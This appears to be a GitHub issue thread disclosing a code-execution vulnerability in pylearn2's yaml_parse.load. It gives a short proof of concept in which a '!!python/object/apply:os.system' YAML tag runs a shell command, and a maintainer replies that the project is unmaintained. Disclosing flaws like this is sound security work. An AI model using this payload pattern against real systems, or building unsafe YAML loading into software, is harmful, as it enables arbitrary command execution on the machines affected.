yaml_parse.load method is vulnerable #1593
Comments
|
This project is dead. I do not think someone will update it unless you do a
PR.
Thanks for the report. It is useful to raise awareness of such type of
problem.
Le lun. 10 déc. 2018 20:34, bigbigliang-malwarebenchmark <
notifications@github.com> a écrit :
… import pylearn2.config.yaml_parse
test_str ='!!python/object/apply:os.system ["ls"]'
test_load = pylearn2.config.yaml_parse.load(test_str)
Hi, there is a vulnerability in load methods in
pylearn2.config.yaml_parse.py,please see PoC above. It can execute
arbitrary python commands resulting in command execution.
—
You are receiving this because you are subscribed to this thread.
Reply to this email directly, view it on GitHub
<#1593>, or mute the thread
<https://github.com/notifications/unsubscribe-auth/AALC-0i20n1Cfrn7-xI2ooAmu22K17Lwks5u3wuzgaJpZM4ZMf85>
.
|
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
import pylearn2.config.yaml_parse
test_str ='!!python/object/apply:os.system ["ls"]'
test_load = pylearn2.config.yaml_parse.load(test_str)
Hi, there is a vulnerability in load methods in pylearn2.config.yaml_parse.py,please see PoC above. It can execute arbitrary python commands resulting in command execution.
The text was updated successfully, but these errors were encountered: